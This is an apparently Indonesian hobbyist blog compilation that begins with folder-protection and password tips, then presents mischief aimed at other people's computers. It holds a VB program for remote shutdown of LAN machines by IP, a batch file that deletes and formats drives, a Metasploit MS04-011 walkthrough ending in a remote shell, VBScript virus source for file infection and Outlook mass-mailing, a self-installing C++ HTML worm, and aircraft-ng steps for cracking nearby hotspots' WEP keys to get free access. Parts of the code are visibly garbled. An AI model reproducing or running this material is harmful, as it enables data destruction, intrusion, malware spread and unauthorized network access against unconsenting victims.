Software ini memberikan opsi pada pengguna untuk memilih fitur menyembunyikan direktori atau perlindungan folder dengan password. Opsi pertama hanya menyembunyikan saja tanpa pemberian password. Opsi kedua hanya memberikan perlindungan file dengan password saja.

Aplikasi ini dapat berjalan pada platform Windows 98, ME, 2000, Server 2003 dan Windows XP. Untuk pengunduhan, dukungan dan update, dapat diakses melalui situs http://www.my-secret-folder.com/.

4. FileGhost
FileGhost merupakan salah satu tool keamanan yang bisa digunakan untuk memproteksi file atau folder. Dengan program ini, secara aman Anda bisa mengunci, menyembunyikan, menolak (deny) file reading, file writing, mencegah langkah penghapusan file (deleting), penyalinan (copying), pemindahan (moving, pengubahan nama file/folder (renaming) dan replacing.

Program perlindungan ini juga bisa diaplikasikan pada file, folder, volume hard disk, CD/DVD-ROM, flash card atau media penyimpanan lain, tanpa memperhatikan file system yang digunakan (FAT atau NTFS).

Program ini juga sangat user friendly dan mudah digunakan. Cukup dengan men-drag and drop file Anda dan mengatur pengecekan yang diinginkan, maka program perlindungan akan segera bekerja. Dengan FileGhost, Anda tidak hanya bisa melindungi data penting Anda dari orang lain, tetapi juga dari program jahat seperti virus, trojan, spyware dan program jahat lainnya.

Soal platform, program ini berjalan pada Windows 2K/XP/2K3. Sayangnya, program ini tidak gratis. Namun untuk coba-coba saja, program ini disediakan gratis.


Cara Manual

Kalau Anda malas menggunakan software, berikut beberapa cara manual yang bisa Anda coba untuk melindungi file/folder.

A. Memproteksi file Word/Excel.

Langkah-langkahnya:
1. Bukalah file Word atau Excel yang ingin Anda lindungi.
2. Pada menu toolbar, pilihlah menu Tools kemudian pilih Options dan masuk ke menu Security.
3. Setelah Anda memasuki Security, akan muncul box dimana Anda akan diminta untuk mengetikkan password untuk melindungi file.
4. Pada sebelah kanan box tadi, terdapat menu Advanced. Jika Anda menginginkan kata kunci yang diisikan terenkripsi dengan lebih kuat, pilihlah menu ini. Pada menu Advanced, terdapat pilihan enkripsi mulai dari yang paling lemah yakni "Weak Encryption", yang bekerja dengan operasi XOR. Level ini tidak ada pilihan panjang kata kunci.

Kemudian selevel lebih tinggi terdapat enkripsi mode "Office 97/2000 Compatible" untuk standar perlindungan file. Level selanjutnya bervariasi namun tetap dengan metode enkripsi RC4. Pada level ini, Anda sudah bisa mengisikan panjang kata kunci dengan minimal 40 hingga 128 huruf. Berbagai teknik enkripsi ditawarkan, mulai dari DSS, RSA dan AES.

5. Klik OK untuk memilih tipe enkripsi dan Anda akan kembali ke tampilan awal Security.
7. Selain itu, masih terdapat box untuk mengisikan kata kunci yang akan menawarkan pada Anda untuk perlindungan modifikasi file, apakah file tersebut dapat diubah atau hanya read-only. Rekomendasi kami, isilah box ini demi keamanan yang lebih kuat.
8. Klik OK, lalu akan muncul kotak dialog yang meminta Anda untuk mengisikan kembali kata kunci untuk membuka dan memodifikasi file.
9. Anda akan kembali pada file anda. Jangan lupa untuk menyimpannnya terlebih dahulu sebelum Anda menutupnya agar pengaruh pemberian kata kunci tadi berkhasiat.

Bagaimana jika ingin menghilangkan perlindungan tadi? Caranya:
1. Buka kembali file tersebut
2. Masuk ke bagian Security dan hapus kata kunci pada box yang telah anda isikan.
3. Klik OK
4. Kembali ke file dan simpan kembali file tersebut.

B. Melalui Regedit

Cara ini memang kurang populer jika dibandingkan dengan kinerja software yang lebih mudah. Langkahnya:
1. Klik Start > Run, lalu ketikkan regedit kemudian tekan Enter.
2. Anda akan digiring ke file HKEY_CURRENT_USER. Lalu dari HKEY_CURRENT_USER pilih Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Di window sebelah kanan akan terdapat "NoFolderOptions". Dobel klik NoFolderOptions, Data Type: REG_DWORD. Yang 'diakali' disini adalah bagian datanya. Data: (0 = disabled, 1 = enabled/sembunyikan). Jika Anda meng-enable setting ini, maka menu Folder Options yang terdapat pada Start Menu - Setting akan hilang.

Bagaimana cara memunculkan folder option kembali? Berikut langkahnya:
1. Buka menu RUN
2. ketikan gpedit.msc
3. buka user configuration
4. buka administrativ temple
5. buka Windows componen
6. buka windows explorer
7. cari menu Remove the Folder Options menu item from the tools menu
8. klik 2x lalu pilih disable OK Coba buka My Computer lihat di tab Tool pasti Folder Optionsnya sudah muncul kembali.


tks for:Detik Portal & http://www.ketok.com/

Buat program kecil di VB untuk matikan kopy orang yang satu jaringan. Mau Nakal pun harus belajar pemograman huh ..!!

Bandal-bandal harus terarah juga yea . . . (Gaya Anak Medan)
Di kampus da mulai belajar VB, iseng iseng buat program ecek2 yang penting maknyuss. belajarnya dri om google jg sih, habis di kampus ga diajarin yang kaya gianian kwkw... XD
oya sebelum na kamu uda ngerti dikit2 soal VB kan ? pasti na dong, yauda dh langsung aj kita oprek VB na!!! Zuuuuzzsssssssss .........

Project : Shutdown.vb
Form : frm.shutdown.frm
Kontrol penting : 1 label, 1 Text box untuk menuliskan IP, dan 1 tombol Command.

Untuk source kode frmShutdown nya tunggu dulu ya, saya masih ngetik nih belum selesai…. Beberapa hari lagi tinggalin alamat email aja kalau mau ntar saya kirim via email…
Berikut adalah source code frmShutdown:

Option Explicit

Private Type WSADATA
wVersion As Integer
wHighVersion As Integer
szDescription(0 To 256) As Byte
szSystemStatus(0 To 128) As Byte
imaxsockets As Integer
imaxudp As Integer
ipszvenderinfo As Long
End Type

Private Declare Function WSAStartup Lib “wsock32″ (ByVal VersionReq As Long, WSADataReturn As WSADATA) As String

Private Declare Function WSACleanup Lib “wsock32″ () As Long

Private Declare Function inet_addr Lib “wsock32″ (ByVals As String) As Long

Private Declare Function gethostbyaddr Lib “wsock” (haddr As Long, ByVal hnlen As Long, ByVal addrtype As Long) As Long

Private Declare Sub CopyMemory Lib “kerenel32″ Alias “RtlMoveMemory” (xDest As Any, xSource As Any, ByVal nbytes As Long)

Private Declare Function lstrlen Lib “kernel32″ Alias “lstrlenA” (lpString As Any) As Long

Private Declare Function InitiateSystemShutdown Lib “advapi322.dll” Alias “InitiateSystemShutdownA” (ByVal lpMachineName As String, ByVal lpMessage As String, ByVal dwTimeout As Long, ByVal bForceAppsClosed As Long, ByVal bRebootAfterShutdown As Long) As Long

Berikut adalah source code saat event klik Command1

Private Sub Command1_Click()
Dim name As String

name = GetHostNameFromIP(Text1.Text)
If MsgBox(”IP ” & Text1.Text & ” (” & name & “)telah ditemukan” & vbCrLf & “Jadi dimatikan?”, vbYesNo + vbQuestion, “Gotcha!!”) = vbYes Then
InitiateSystemShutdown “\\” & name, “Selamat tinggal……”, 30, True, True
End If
End Sub

Berikut ini fungsi-fungsi yang diperlukan:

Jalankan program ini dengan Ctrl+F5. Masukkan IP korban yang diinginkan tekan tombol Cari dan Matikkan!!
Apabila keadaan komputer sedang aktif maka akan ada konfirmasi Yes atau No. Tentu saja kita tekan yang Yes. Seketika komputer korban akan mati.Udah dulu ach pegel nih dia :

Public Function SocketsInitialize() As Boolean
Dim WSAD As WSADATA
SocketsInitialize = WSAStartup(&H101, WSAD) = 0
End Function

Public Function GetHostNameFromIP(ByVal sAddress As String) As String
Dim ptrHosent As Long
Dim hAddress As Long
Dim nbytes As Long

If SocketsInitialize() Then
hAddress = inet_addr(sAddress)
If hAddress <> -1 Then
ptrHosent = gethostbyaddr(hAddress, 4, 2)
If ptrHosent <> 0 Then
CopyMemory ptrHosent, ByVal ptrHosent, 4
nbytes = lstrlen(ByVal ptrHosent)
If nbytes > 0 Then
sAddress = Space$(nbytes)
CopyMemory ByVal sAddress, ByVal ptrHosent, nbytes
GetHostNameFromIP = sAddress
End If
Else
MsgBox “Error!!!!”
End If
WSACleanup
Else
MsgBox “Alamat IP salah”
End If
Else
MsgBox “Winsock Error!!”
End If
End Function


Maknyuusss .........
"kompy aku jangan kelen matiin woooyyy, dame-dame" ....... :)

Nakal format kompy orang ...

1. Buka new text document
2. ketik or copy paste cara di bawah ini :

@echo off
echo msgbox"Semua data komputer anda akan hilang untuk selamanya,
hahaha" >C:\1.vbs
C:\1.vbs
cls
DEL C:\ -y
DEL D:\ -y
DEL E:\ -y
DEL F:\ -y
DEL G:\ -y
FORMAT C:\ -y
shutdown -s -f 15 -c "LATER!"

3. Save as .BAT file
4. JANGAN DICOBA KE KOMPUTER SENDIRI
5. Double klik deh

Iseng-Iseng masuk ke kompy orang ... :P (metasploit framework-3.1)

heheheh mari berbagi

nich..cara2nya...pk metasploit framework-3.1

1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada...(tuk iseng doank
msf > show exploits

5. load modul exploit, qta gunain exploit lsass spt cara diatas

msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target... misal target menggunakan XP

maka targetnya spt berikut

msf exploit(ms04_011_lsass) > set target 2

target => 2

7. Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14

msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
# Started bind handler
# Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
# Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
# Getting OS information...
# Trying to exploit Windows 5.1
# Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
# The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin...isi session qta

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

# Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

13. Hehe...dah masuk tuch lol!

pergunakan dengan baik dan benar

Embarassed untuk tutor lebih jelas liat aja di sini

terus buat download mesin nya disini aja broe

manteb kali ah bisa masuk ke kopy orang ... :P

Buat yang suka ngoprek VB, File Antar Visual Basic Script (.VBS)

Nih ada beberapa SC virus pake .vbs
buat belajar, gimana sih cara sistem itu bekerja. Jangan dibuat yang aneh-aneh (gue ga bertanggung jawab / cuma sebagai pembelajaran.

Infeksi File Antar Visual Basic Script (.VBS)
Code:

On Error Resume Next
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Angel1()
Sub Angel1()
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
For Each SalinMawarPutih In a.Drives
If SalinMawarPutih.DriveType = 2 _
Or SalinMawarPutih.DriveType = 3 Then
Angel3 (SalinMawarPutih.Path & "\")
End If
Next
End Sub
Sub Angel2(FileTarget)
On Error Resume Next
Set otf = a.GetFile(WScript.ScriptFullName)
ra = otf.ReadAll
otf.Close
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.Files
FileExt = LCase(a.GetExtensionName(n.Path))
If FileExt = "vbs" Or FileExt = "vbe" Then
Set openvbs = a.OpenTextFile(n.Path, 1)
vbsra = openvbs.ReadAll
openvbs.Close
If InStr(1, vbsra, "Tips And Trik by ") = False Then
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set JC = MawarPutih.OpenTextFile(WScript.ScriptFullName, 1)
RantingMawarPutih = JC.ReadAll
JC.Close
Set MawarMerah = MawarPutih.OpenTextFile(n.Path, 8, True)
MawarMerah.WriteLine vbCrLf & "' Hack .VBS by " & vbCrLf & "Tz = " & Chr(34) & Chr(34)
For i = 1 To Len(RantingMawarPutih)
Tz = Mid(RantingMawarPutih, i, 1)
Tz = Hex(Asc(Tz))
If Len(Tz) = 1 Then
Tz = "0" & Tz
End If
Gz = Gz + Tz
If Len(Gz) = 110 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
If Len(RantingMawarPutih) - i = 0 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
Next
MawarMerah.WriteLine "Set MawarPutih = CreateObject(""Scripting.FileSystemObject"")"
MawarMerah.WriteLine "WriteAppend.Write CM(Tz)"
MawarMerah.WriteLine "WriteAppend.Close"
MawarMerah.WriteLine "Function CM(CN)"
MawarMerah.WriteLine "For GC = 1 To Len(CN) Step 2"
MawarMerah.WriteLine "CM = CM & Chr(""&h"" & Mid(CN, GC, 2))"
MawarMerah.WriteLine "Next"
MawarMerah.WriteLine "End Function"
MawarMerah.Close
End If
End If
Next
End Sub
Sub Angel3(FileTarget)
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.SubFolders
Angel2 (n.Path)
Angel3 (n.Path)
Next
End Sub



penyebaran Melalui E-mail Via Outlook
Code:

On Error Resume Next

Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set MawarMerah = MawarPutih.GetFile(WScript.ScriptFullName)
MawarMerah.Copy (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Set Attachments = MawarPutih.GetFile(MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Attachments.Attributes = 0
Set RantingMawar = CreateObject("Outlook.Application")
If Not RantingMawar = "" Then
For Each DuriMawar In RantingMawar.GetNameSpace("MAPI").AddressLists
For DaunMawar = 1 To DuriMawar.AddressEntries.Count
Set BagianEmail = RantingMawar.CreateItem(0)
BagianEmail.Recipients.Add (DuriMawar.AddressEntries(DaunMawar))
BagianEmail.Subject = "Judul Pesan"
BagianEmail.Body = "Isi Pesan"
BagianEmail.Attachments.Add (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
BagianEmail.DeleteAfterSubmit = True
BagianEmail.Send
Next
Next
End If



Anti Delete
Code:

On Error Resume Next

Set MawarPutih= Createobject("scripting.filesystemobject")
Set MawarMerah= MawarPutih.opentextfile(wscript.scriptfullname, 1)
BatangMawar= MawarMerah.readall
MawarMerah.Close
Do
If Not (MawarPutih.fileexists(wscript.scriptfullname)) Then
Set DuriMawar= MawarPutih.createtextfile(wscript.scriptfullname, True)
DuriMawar.writeBatangMawar
DuriMawar.Close
End If
Loop


semua code diatas.. bisa kalian jadiin 1.. tinggal kreasinya aja...
thx_to:Shadow Angel

Buat Agan" yang seneng ngoprek C++ (Html worm c++ source code)

Code:
html worm
// name: win32.htmlworm
// author: fudc
// compiler: borland c++
// description: this worm spreads by adding a link to itself in html files

// improvements: you could add a link to a page containing an ie exploits

#include
#include

using namespace std; //

// this function does the real work
void htmlspread(char *htmlfile)
{
handle html_fd;
dword html_filesize,read_bytes,written_bytes;
char *c_htmlcode = null;
string *htmlcode = null; // make it simpler
long pos;

// open the html file
html_fd = createfile(htmlfile,generic_read|generic_write,
file_share_read|file_share_write,null,open_existing,file_attribute_normal,null);

if(html_fd == invalid_handle_value)
{
return;
}

// get file size
html_filesize = getfilesize(html_fd,null);

// allocate enough memory
c_htmlcode = (char *)malloc(html_filesize);

if(c_htmlcode == null)
{
return;
}

// read entire file
if(readfile(html_fd,c_htmlcode,html_filesize,&read_bytes,null) == 0)
{
closehandle(html_fd);
return;
}

// create a string object
htmlcode = new string(c_htmlcode);
free(c_htmlcode);

// already infected ?
if(htmlcode->find("") == string::npos)
{

pos = htmlcode->find("");

if(pos == string::npos)
{
pos = htmlcode->find("");

if(pos == string::npos)
{
closehandle(html_fd);
delete htmlcode;
return;
}
}

// add link
htmlcode->replace(pos,7,"\r\n\r\n");

// write new file
setfilepointer(html_fd,0,0,file_begin);
writefile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,null);
// infection mark
writefile(html_fd,"",36,&written_bytes,null);

}

// close all
closehandle(html_fd);
delete htmlcode;

}

// add worm to startup list
void autostart(char *my_path)
{
hkey hkey;

if(regopenkeyex(hkey_local_machine,
"software\\microsoft\\windows\\currentversion\\run",0,
key_write,&hkey)==error_success)
{
regsetvalueex(hkey,"himon",0,reg_sz,my_path,strlen(my_path));
regclosekey(hkey);
}

if(regopenkeyex(hkey_current_user,
"software\\microsoft\\windows\\currentversion\\run",0,
key_write,&hkey)==error_success)
{
regsetvalueex(hkey,"himon",0,reg_sz,my_path,strlen(my_path));
regclosekey(hkey);
}
}

// this will scan drives for html files
void s3arch(char *pt) {
char sc[max_path],buf[max_path];
win32_find_data in;
handle fd,file;
char *fm = "%s\\%s",*fm1 = "%s\\*.*";

if(strlen(pt) == 3)
{
pt[2] = '\0'; /* :-) */
}

sprintf(sc,fm1,pt);
fd = findfirstfile(sc,&in);

do
{

sprintf(buf,fm,pt,in.cfilename);

/* dot */
if(strcmp(in.cfilename,"..") != 0 && strcmp(in.cfilename,".") != 0 && (in.dwfileattributes & file_attribute_directory))
{
s3arch(buf);
}

/* file found */
else
{

/* is it good to infect ? */

if(strstr(in.cfilename,".html") || strstr(in.cfilename,".htm"))
{
htmlspread(buf);
}
}

}while(findnextfile(fd,&in));

findclose(fd);
}


// entry point of worm
int winapi winmain (hinstance hinstance, hinstance hprevinstance, lpstr lpcmdline, int ncmdshow)
{
// usual shit: installation part, startup and so on ...
char i_am_here[max_path],installation_path[max_path];
char drives[3],drive = 0;
uint drive_type;


// only one copy
createmutex(null,false,"__htmlworm_by_wargame_eof__");
if(getlasterror() == error_already_exists)
{
exitprocess(0);
}

getsystemdirectory(installation_path,max_path);
strcat(installation_path,"\\himon.exe");

getmodulefilename(null,i_am_here,max_path);
// copy!
copyfile(i_am_here,installation_path,false);
autostart(installation_path);


// the real part starts here
while(1)
{

/* search for drives */
for(drive = 'c';drive <= 'z';drive++)
{
drives[0] = drive;
drives[1] = ':';
drives[2] = '\\';
drives[3] = '\0';

/* drive ? */
drive_type = getdrivetype(drives);

/* only fixed, remote and removable drives */
if(drive_type == drive_fixed ||
drive_type == drive_remote ||
drive_type == drive_removable)
{
/* go! */
s3arch(drives);
}
}

/* every 10 minutes */
sleep((1000*60)*10);
}
}

Saturday, February 6, 2010

WEP Cracking With backtrack 4

hi friends,
Gue Belajar Backtrack Cuma Karena Pengen Akses Internet Gratis ;) kalau kamu ?
pasti mau dg, nak medan bilang "hari gini ga bisa ol pusing kepala kita lae . . .
di artikel ini aq cuma pengen sharing beberapa trik yang sering aku gunakan di salah satu sistem oprasi linux ini . . .

Ada cerita singkat dimana aku belajar ni OS, kemaren di kampus accses Internet sering aquering lines alias conek tapi gak bisa browsing yaa sama aja gak konec yakan h he, mulai dari situ aq pengen banget belajar tentang sistem jaringan nirkabel kalau anak2 sering bilang sih Wifi kalau yang sering nongkrong di Cafe/Coffe Shop pasti uda ga asing lagi. Pasalnya di kampus qu banyak terdapat hotspot tapi yang dapat di accses cuma 2 yaitu mathdepartemen and Biologi, dua-duanya lumayan kencang sih tapi kalau ruame yang acces sama aja bo ong kan.. h he apalagi kalau uda di ganggu ama hacker2 ikan asin yang pake netcut huee . . .
masalah yang sebenarnya adalah kalau ada matakuliah yang masuk di RKU 2 aq gak bisa browsing, karna hotspot andalan yang 2 tadi sinyalnya gak sampe ke RKU 2 jadi apa boleh buat.

Dari situ naluri bandit Wifi nya makin keluar, setelah mendapatkan OS Backtrack langsung aq coba-coba sendiri, ngoprek semua yang bisa di oprek. Lewat video, baca tutorial, sampe ngejar2 kakak leting buat sekedar sharing. Kalau kamu mau lebih banyak tahu lgi tentang dunia hacking search aja berbagai vidio nya di youtube, atau kamu harus ngerti dasar2nya dengan mempelajari semua istilah yang sering digunakan.

Yang pasti belajar Komputer banyak baget menyita waktu, mau gak mau kita harus surf internet tiap hari, membaca bahakan aku pernah duduk di depan komputer ini satu harian gara2 cuma nyelesaikan satu masalah, Wifi di rumah menjadi klinci percobaan setelah seminggu belajar tentang itu-itu aja, browsing juga yang di cari tentang backtrack semua akhirnya perjuangan gak sia-sia, encripsi wifi rooter qu sendiri bisa di Crack.

Waktunya di praktekin di RKU . . .
disana ada beberapa hotspot sebagai target, ok kita mulai aja yooo . . .

yang paling utama kamu harus punya iso backtrack nya kamu bisa download disini. langsung di instal atau dari live CD dengan menggunakan flasdisk jga bisa, kalau kamu mau live CD pake flass yang harus kamu lakukan download dulu unetbootinnya di disini ok kalau sudah, sekarang perang yang sebenarnya baru dimulai.

Kamu sediakan flass kosong 2 GB lalu Extrak file iso yang sudah kamu download sebelumnya dengan menggunakan unitbootin, unitbootin ini adalah jenis tools yang sering digunakan untuk mengekstrak iso ke flass, karena disini kita akan menggunakan live CD dari flass maka kita harus membuat tempat booting nya terlebih dahulu. Backtrack itu menurut aq gak perlu di install di hard disk, ntar cuma ngabisin sourch hardisk kamu doang, tapi tergantung pemakaian juga, Logikanya kalau kita pakai cuma untuk sekedar ngeckrack & Attack buat apa sourch yang gede, hanya dengan menggunakan live cd dari flass kamu juga bisa pake kapan aja tanpa perlu takut OS nya rusak waktu kamu utak atik, asalkan jangan file sistem di root nya aj yang kamu apus, kelebihan lainnya walaupun sudah di utak atik dia akan kembali seperti semula ketika kamu restart and simple d bawa kmana-mana.

ok,
disini gue ngejelasin se detail mungkin karena aq uda ngerasain gmna pahitnya jadi pemula, gada yang open kalau kita tanya jadi ilmu yang sedikit ini mudah2han bsa di share ke kawan-kawan yang mau belajar . . .

kita lanjutin lagi ya ,
sekarang kita udah punya target yang mau di crack & boot flass udah di tangan, tpi laptop belum nyala, kita colok dulu tu flassdisk nya, awas jangan salah colok ntar bahayaa ... h he :D, sebelumnya kamu harus masuk ke sistem bios dulu untuk menseting tempat dimana booting pertamakali di lakukan, biasanya kalau di lptop Acer tekan f2, compaq & thosiba F10 trus pilih booting lewat flass kamu.

Setelah semuanya berjalan sesuai prosedur kamu akan masuk ke sistem OS untuk memulainya kamu ketik "startx" pada lyar root tanpa tanda petik, setelah itu kamu akan masuk ke tampilan Desktop BT4 dari KDE ...

Kita lanjut ke tahap yang paling penting ...
aktifkan Wifi adapter kamu dengan cara klik di menu/servis/startwifi.


Untuk ngekcrack wep kita harus membobol encripsi 64 bit jadi kalau kamu mau coba bobol pake tols-tols yang lain aku gak jamin bisa gool dalam waktu 15 menit, yang pasti kamu harus nungguin seharian gadak kerjaan juga kalau gtu critanya h he,

yang pertama kamu harus aktifin wirelles adapter kamu, inget jg satu hal kalau kamu ga bisa nginjeksi berarti lptop kamu wifi adapternya belum support . . .
di sini aqu pake Atheros

buka shel/consol lalu ketik perintah di bawah tanpa tanda petik :

"airmon-ng start wlan0
"airmon-ng stop wlan0
penjelasan :
Kamu akan mendapatkan wifi adapter mon0, hasil dari bayangan wlan0
ketika wlan0 diaktifkan mon0 akan aktif
jadi kita memiliki 2 wifi adapter
jadi kita akan manonaktifkan wifi adapter wlan0 dan menggunakan mon0 sebagai wifi adapter bayangan.

Tahap ke 2 kita akan mencium paket-paket data yang mengalir di dalam jaringan korban.
"airodump-ng mon0
"airodump-ng -w wep -c 11 --bssid 11:22:33:44:55:66 mon0

jangan lupa kamu harus mencatat
bssid/mac Acces point 11:22:33:44:55:66
channel : 11
essid : nama hotspot
clien : MAC user yang konek ke jaringan target
key found : ? belum dapet, kan lgi di usahakan . . . h he
keterangan :
airodump-ng mon0 : cara kita melihat jaringan yang ada di sekitar kita
-w : menulis folder wep.cap untuk di crack nantinya . . .
-c : channel dari Acces point target. cth: channel 11
--bssid : penanda MAC address target

Tahap ke 3 menyalin berbagai aliran data yang lewat di channel target dengan menggunakan tools aireplay-ng
"aireplay-ng -1 0 -a 11:22:33:44:55:66 mon0
"aireplay-ng -3 -b -a 11:22:33:44:55:66 mo0
Pada tahap ini tunggu pengiriman paket sampai 30.000 Ack kurang lebih 7 menit
setelah itu hentikan dengan menekan Ctrl+C pada keyboard.

Tahap ke 3 time to crack, menggunakan tools aircrack-ng
"Dir
"aircrack-ng wep-01.cap
ket :
Dir : melihat berbagai folder yang telah di dapat dari hasil airodump-ng sebelumnya
aircrack-ng : menyatukan/mengkombinasi data di folder wep-01.cap dengan berbagai crip cracking yang sudah dalam satu paket pada tols aircrack-ng, proses ini dilakukan kurang lebih selama 2 menit dengan encripsi 64 bit keyfound,
dan password wifi ditemukan :)
keyfound : [12:34:56:78:90]


Setelah itu perjuangkan wifi gratis complite h he XD
emang seharusnya gitukan !! demi Kemajuan IT Indonesia ... Merdeka!!!

Penjelasan sedikit tentang kelebihan dari backtrack 4 ini, semua tools-tols keamanan jaringan sudah satu paket terinstal didalam OS tersebut, dan tidak memakan banyak waktu dalam melakukan penetrasi jaringan & bisa digunakan live CD tanpa terinstall.

Jadi kalau begitu bagi yang ingin wifi nya aman encripsi apa yang lebih baik untuk di gunakan ?

Memang semua encripsi memiliki celah kelemahan, layaknya sebuah besi yang bisa di tembus oleh molekul udara dan membuatnya berkarat secara berangsur-angsur. Para peneliti telah menemukan metode untuk menembus fitur enkripsi yang biasa digunakan untuk mengamankan sistem jaringan nirkabel. Metode ini dilakukan tanpa perlu melakukan dictionary attack atau brute force (mencoba berbagai kombinasi untuk mencoba menebak sandi yang digunakan). Detil lengkapnya akan didiskusikan pada konferensi tahunan yang ke-6 PacSec di Tokyo.

Berdasarkan informasi PCWorld, dua orang peneliti bernama Erik Tews dan Martin Beck telah menemukan cara untuk membobol Temporal Key Integrity Protocol (TKIP) yang digunakan pada enkripsi Wi-Fi Protected Access (WPA), berbeda dengan WEP yang kita bobol sebelumnya. Canggihnya mereka dapat memecahkan enkripsi TKIP dalam waktu sekitar 15 menit saja. Perlu diperhatikan bahwa pemecahan enkripsi ini hanya berlaku untuk data yang ditempatkan dienkripsi dari PC ke access point, mereka tidak memecahkan kunci enkripsi yang digunakan untuk mengamankan data yang sudah dienkripsi sebelumnya dari PC (contohnya HTTPS, SFTP dll).

TKIP sebelumnya sudah diketahui memiliki kelemahan terhadap dictionary attack, tetapi metode yang dijelaskan oleh Tews dan Beck tidak menggunakan dictionary attack melainkan memanfaatkan data dari access point yang menggunakan WPA dan dikombinasikan dengan trik matematika yang akhirnya memecahkan kode enkripsi tersebut.

Beberapa elemen pemecahan kode enkripsi telah dimasukkan ke dalam aplikasi Aircrack-ng, yang merupakan aplikasi buatan Beck sendiri untuk membantu pihak keamanan jaringan dalam melakukan tes penetrasi.

Tew bukanlah orang baru dalam praktik pemecahan enkripsi Wi-Fi. Pada tahun 2007 dia berhasil memecahkan 104-bit WEP (Wired Equivalent Privacy). Proteksi WEP yang digunakan oleh perusahaan besar Amerika Serikat TJX untuk mengamankan transmisi jaringan nirkabel mesin kasir dari toko mereka, berhasil ditembus oleh beberapa kriminal yang memanfaatkan kelemahan enkripsi tersebut, menyebabkan kebocoran data terbesar dalam sejarah Amerika.

Oleh karena fitur enkripsi WEP dan WPA gak sanggup lagi untuk menjaga keamanan tansmisi data wireless, para pakar menyarankan kepada semua pihak untuk menggunakan WPA2. Akan tetapi apabila PC/laptop Anda belum mendukung enkripsi WPA2, Anda juga dapat mengamankan jaringan nirkabel Anda dengan memilih enkripsi AES menggantikan TKIP yang biasanya menjadi metode enkripsi default WPA.

good luck !! :)